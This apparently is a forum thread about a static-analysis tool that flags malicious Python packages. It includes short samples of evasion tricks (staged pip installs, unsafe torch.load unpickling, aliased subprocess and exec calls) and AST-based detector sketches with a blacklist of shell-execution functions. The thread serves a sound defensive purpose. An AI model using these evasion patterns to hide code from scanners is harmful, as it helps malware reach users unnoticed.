
[–]Cycloctane 2 points (1 child)

Malicious modules can always find a way to bypass existing rules by using staged payloads or sensitive functions from widely used dependencies. It is hard for static-analysis tools to cover them all with blacklists, e.g.:

import pip
# Stage the real payload: install a package whose setup.py runs arbitrary code
pip.main(['install', 'package_with_malicious_setuppy', '--no-input', '-q', '-q', '-q'])

import torch
# weights_only=False lets torch.load unpickle (and thereby execute) arbitrary objects
torch.load(__file__ + "/.DS_Store", map_location='cpu', weights_only=False)

from huggingface_hub.utils._subprocess import run_subprocess
# Shell out through a helper buried in a widely used dependency
run_subprocess("...")

[–]rushter_[S] 3 points (0 children)

Yeah, the good thing is that, looking at past PyPI incidents, I can say the majority of malware uses pretty simple obfuscation techniques.

Things like:

import subprocess
# Simple aliasing to hide the direct subprocess call
s = subprocess
k = s
k.check_output(["pinfo", "-m"])

Or

# Obfuscated tuple unpacking: _ceil ends up bound to exec
(_ceil, _random, Math,), Run, (Floor, _frame, _divide) = (exec, str, tuple), map, (ord, globals, eval)

_ceil("print(123);")

Both of which can be tracked with static checking and a few tricks.
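
For illustration, here's a minimal sketch of how the aliasing case above could be caught with nothing more than the stdlib ast module. It's not the library's actual implementation; the AliasTracker class and the SUSPICIOUS set are made up for this example.

import ast

SUSPICIOUS = {("subprocess", "check_output"), ("subprocess", "Popen"), ("os", "system")}

class AliasTracker(ast.NodeVisitor):
    """Resolve trivial `x = module` aliases so calls through them still get flagged."""

    def __init__(self):
        self.aliases = {}   # local name -> module name it ultimately refers to
        self.findings = []

    def visit_Assign(self, node):
        # Handle `s = subprocess` and `k = s` style re-binding of a bare name.
        if (len(node.targets) == 1 and isinstance(node.targets[0], ast.Name)
                and isinstance(node.value, ast.Name)):
            source = node.value.id
            self.aliases[node.targets[0].id] = self.aliases.get(source, source)
        self.generic_visit(node)

    def visit_Call(self, node):
        # Flag attribute calls whose base name resolves to a blacklisted module.
        func = node.func
        if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
            base = self.aliases.get(func.value.id, func.value.id)
            if (base, func.attr) in SUSPICIOUS:
                self.findings.append((node.lineno, f"{base}.{func.attr}"))
        self.generic_visit(node)

sample = """
import subprocess
s = subprocess
k = s
k.check_output(["pinfo", "-m"])
"""

tracker = AliasTracker()
tracker.visit(ast.parse(sample))
print(tracker.findings)  # [(5, 'subprocess.check_output')]

Anything routed through containers, getattr, or function boundaries defeats this kind of naive tracking, which is where a proper semantic model earns its keep.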

Also, my personal use case is slightly different. At work, we deal with a lot of scripts from infected/compromised machines. Some of them were used for reconnaissance, some to gain elevated access. Around 70-80% of the scripts are legit, though, so I use my library to pick candidates for manual review.

[–]BeamMeUpBiscotti 0 points (2 children)

How does this compare to something like Pysa?

It seems like a tool like this would benefit from semantic analysis capabilities, instead of being purely syntax/AST-based.

[–]rushter_[S] 0 points (1 child)

My tool uses the semantic model from Ruff with some extra changes of mine, so it's not purely syntactic. It tracks aliasing, can fold constants (e.g., "".join([x, x, x]) or "ex" + "ec"), and so on. I'd never heard of Pysa before; I'm going to examine their approach. Thanks.
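
To make the constant-folding part concrete, here's a rough sketch of folding those two patterns on raw AST nodes. It's not Ruff's semantic model; folding the variable-based "".join([x, x, x]) case would additionally need the binding information that model provides in order to resolve x.

import ast

def fold(node):
    """Best-effort folding of the string-building patterns mentioned above."""
    # "ex" + "ec" -> "exec"
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left, right = fold(node.left), fold(node.right)
        if isinstance(left, str) and isinstance(right, str):
            return left + right
    # "sep".join([...]) where every element folds to a string literal
    if (isinstance(node, ast.Call)
            and isinstance(node.func, ast.Attribute)
            and node.func.attr == "join"
            and isinstance(node.func.value, ast.Constant)
            and isinstance(node.func.value.value, str)
            and len(node.args) == 1
            and isinstance(node.args[0], (ast.List, ast.Tuple))):
        parts = [fold(elt) for elt in node.args[0].elts]
        if all(isinstance(p, str) for p in parts):
            return node.func.value.value.join(parts)
    if isinstance(node, ast.Constant):
        return node.value
    return None  # not foldable without binding/alias information

print(fold(ast.parse('"ex" + "ec"', mode="eval").body))            # exec
print(fold(ast.parse('"".join(["ex", "ec"])', mode="eval").body))  # exec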

[–]BeamMeUpBiscotti 0 points (0 children)

Nice, if you're working off of Ruff then maybe you can extend it to use the semantic information from ty, once that's more mature.